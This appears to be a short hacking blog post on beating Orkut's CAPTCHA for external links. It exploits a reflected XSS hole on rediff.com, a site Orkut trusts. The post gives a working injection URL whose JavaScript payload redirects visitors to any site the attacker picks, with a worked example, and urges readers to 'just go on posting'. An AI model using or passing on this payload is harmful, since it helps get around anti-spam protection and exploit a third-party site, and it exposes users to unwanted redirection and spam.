This post will guide you through the method of cracking captcha of orkut.com using XSS vulnerability present in rediff.com.For familiarity with XSS vulnerability you may go through my basic xss tutorial.
What is CAPTCHA ??
Completely Automated Public Turing test to tell Computers and Humans Apart -used to decide whether a program or online service is being operated by a human or machine user.It is an image displaying a message along with lines or shades that make it hard for a computer to do character recognition.
What is use of CAPTCHA ??
To prevent accounts from being created by programs or spiders.
The ultimate objective is to reduce spam.
Ok,how to use XSS in rediff to bypass captcha in orkut ??
Orkut asks to enter CAPTCHA everytime an external link is sent through scap or community post only if the link is not from the affiliated site.So,in this hack snds external links without any CAPTCHA.
1. Here we'll use XSS for redirection to our desired link.
2.The hack depends on rediff.com as the site is coded with little security and xss holes are left in each and every page.
3.Since, orkut allows rediff sites to be posted without captcha , we can use that for our use.
Take a look at the link given below ::
http://shop.rediff.com/shop/searchv3_gall.jsp?Query=%22%3Bwindow%0A.location%3D%27http%3A//[YOUR SITE HERE]%27%3B%22
Example::
http://shop.rediff.com/shop/searchv3_gall.jsp?Query=%22%3Bwindow%0A.location%3D%27http%3A
//google.com%27%3B%22
The link given above takes us to google.com.
SO, just go on posting ...
The link does open rediff page for 1 second before redirecting to your page
No comments:
Post a Comment